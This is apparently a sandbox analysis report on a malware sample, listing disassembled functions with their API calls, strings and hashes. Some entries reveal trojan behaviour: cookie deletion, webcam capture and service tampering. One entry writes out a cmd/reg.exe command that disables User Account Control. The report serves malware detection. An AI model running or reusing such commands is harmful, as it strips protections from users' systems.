            Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
            • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
            • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
            • Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
            • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
            Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
            Download Yara Rule
            APIs
            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
            • GetLastError.KERNEL32 ref: 0040AA28
            Strings
            • [Chrome Cookies not found], xrefs: 0040AA42
            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
            • UserProfile, xrefs: 0040A9EE
            • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: DeleteErrorFileLast
            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
            • API String ID: 2018770650-304995407
            • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
            • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
            • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
            • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
            Function 00418D76 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
            • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
            • Sleep.KERNEL32(00002710), ref: 00418DBD
            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: PlaySound$HandleLocalModuleSleepTime
            • String ID: Alarm triggered$`#v
            • API String ID: 614609389-3049340936
            • Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
            • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
            • Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
            • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
            Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
            Download Yara Rule
            APIs
            • __allrem.LIBCMT ref: 00438A09
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
            • __allrem.LIBCMT ref: 00438A3C
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
            • __allrem.LIBCMT ref: 00438A71
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
            • String ID:
            • API String ID: 1992179935-0
            • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
            • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
            • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
            • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
            Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: __cftoe
            • String ID:
            • API String ID: 4189289331-0
            • Opcode ID: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
            • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
            • Opcode Fuzzy Hash: 6721aee484eec6af142a787e0ccbed3fea0baaedfcb9b8799baac12631cf5e23
            • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
            Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: __freea$__alloca_probe_16_free
            • String ID: a/p$am/pm
            • API String ID: 2936374016-3206640213
            • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
            • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
            • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
            • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
            Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
            Download Yara Rule
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
            • int.LIBCPMT ref: 0040F8D7
              • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
              • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
            • std::_Facet_Register.LIBCPMT ref: 0040F917
            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
            • __Init_thread_footer.LIBCMT ref: 0040F97F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
            • String ID:
            • API String ID: 3815856325-0
            • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
            • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
            • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
            • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
            Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
            Download Yara Rule
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ChangeConfigManager
            • String ID:
            • API String ID: 493672254-0
            • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
            • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
            • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
            • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
            Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
            • _free.LIBCMT ref: 0044575C
            • _free.LIBCMT ref: 00445784
            • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
            • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
            • _abort.LIBCMT ref: 004457A3
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$_free$_abort
            • String ID:
            • API String ID: 3160817290-0
            • Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
            • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
            • Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
            • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
            Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
            Download Yara Rule
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ControlManager
            • String ID:
            • API String ID: 221034970-0
            • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
            • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
            • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
            • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
            Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
            Download Yara Rule
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ControlManager
            • String ID:
            • API String ID: 221034970-0
            • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
            • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
            • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
            • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
            Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
            Download Yara Rule
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ControlManager
            • String ID:
            • API String ID: 221034970-0
            • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
            • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
            • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
            • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
            Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
            • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
            • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseCreateHandleSizeSleep
            • String ID: h G
            • API String ID: 1958988193-3300504347
            • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
            • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
            • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
            • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
            Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
            Download Yara Rule
            APIs
            • RegisterClassExA.USER32(00000030), ref: 0041B310
            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
            • GetLastError.KERNEL32 ref: 0041B335
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ClassCreateErrorLastRegisterWindow
            • String ID: 0$MsgWindowClass
            • API String ID: 2877667751-2410386613
            • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
            • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
            • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
            • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
            Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
              • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
            • _UnwindNestedFrames.LIBCMT ref: 00437631
            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
            • CallCatchBlock.LIBVCRUNTIME ref: 00437667
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
            • String ID: /zC
            • API String ID: 2633735394-4132788633
            • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
            • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
            • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
            • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
            Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
            Download Yara Rule
            APIs
            • GetSystemMetrics.USER32(0000004C), ref: 004173AA
            • GetSystemMetrics.USER32(0000004D), ref: 004173B0
            • GetSystemMetrics.USER32(0000004E), ref: 004173B6
            • GetSystemMetrics.USER32(0000004F), ref: 004173BC
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: MetricsSystem
            • String ID: ]tA
            • API String ID: 4116985748-3517819141
            • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
            • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
            • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
            • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
            Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
            Download Yara Rule
            APIs
            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
            Strings
            • C:\Windows\System32\cmd.exe, xrefs: 0040E542
            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseHandle$CreateProcess
            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
            • API String ID: 2922976086-4183131282
            • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
            • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
            • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
            • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
            Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
            • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
            • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
            • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
            • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
            Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
            Download Yara Rule
            APIs
            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            Strings
            • Connection KeepAlive | Disabled, xrefs: 004050D9
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
            • String ID: Connection KeepAlive | Disabled
            • API String ID: 2993684571-3818284553
            • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
            • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
            • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
            • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
            Function 004013F2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
            Download Yara Rule
            APIs
            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
            • GetProcAddress.KERNEL32(00000000), ref: 00401403
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: GetCursorInfo$User32.dll$`#v
            • API String ID: 1646373207-1032071883
            • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
            • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
            • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
            • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
            Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
            • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
            • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
            • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
            Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
            Download Yara Rule
            APIs
            • Sleep.KERNEL32(00000000,?), ref: 004044A4
              • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: H_prologSleep
            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
